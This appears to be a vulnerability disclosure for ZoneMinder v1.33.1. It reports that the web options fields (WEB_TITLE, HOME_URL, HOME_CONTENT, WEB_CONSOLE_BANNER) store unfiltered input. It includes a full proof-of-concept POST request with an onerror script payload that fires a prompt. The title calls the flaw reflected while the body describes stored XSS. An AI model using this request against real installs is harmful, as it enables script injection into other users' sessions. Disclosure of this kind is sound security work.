Reflected Cross Site Scripting (XSS) - functions.php

[Loginsoft-Research]

Describe Your Environment

• ZoneMinder v1.33.1
• Installed from - ppa:iconnor/zoneminder-master

Describe the bug
The view options, does no input validation to the value supplied to WEB_TITLE, HOME_URL, HOME_CONTENT, WEB_CONSOLE_BANNER field & processes it further storing the value into the
database without any prior filtration, leading to stored XSS.

To Reproduce
Affected URL :
http://localhost/zm/index.php

POST Data -

view=options&tab=web&action=options&newConfig[ZM_WEB_TITLE]=${Injectionpoint}$&newConfig[ZM_WEB_TITLE_PREFIX]=aa&newConfig[ZM_HOME_URL]=${Injectionpoint
}$&newConfig[ZM_HOME_CONTENT]="><img src=x onerror=prompt('1');>&newConfig[ZM_WEB_CONSOLE_BANNER]=${Injectionpoint}$&newConfig[ZM_WEB_RESIZE_CONSOLE]=1&newConfig[
ZM_WEB_POPUP_ON_ALARM]=1&newConfig[ZM_WEB_ALARM_SOUND]=&newConfig[ZM_WEB_EVENT_SORT_FIELD]=DateTime&newConfig[ZM_WEB_EVENT_SORT_ORDER]=as
c&newConfig[ZM_WEB_EVENTS_PER_PAGE]=25&newConfig[ZM_WEB_LIST_THUMB_WIDTH]=48&newConfig[ZM_WEB_LIST_THUMB_HEIGHT]=0&newConfig[ZM_WEB_USE_OB
JECT_TAGS]=1&newConfig[ZM_WEB_XFRAME_WARN]=1&newConfig[ZM_WEB_FILTER_SOURCE]=Hostname

Payload used - "><img src=x onerror=prompt('1');>

• Navigate to the Affected URL, WEB_TITLE, HOME_URL, HOME_CONTENT, WEB_CONSOLE_BANNER will beset with the Payload & get triggered.

Expected behavior

• Proper escaping of special characters.

Debug Logs

None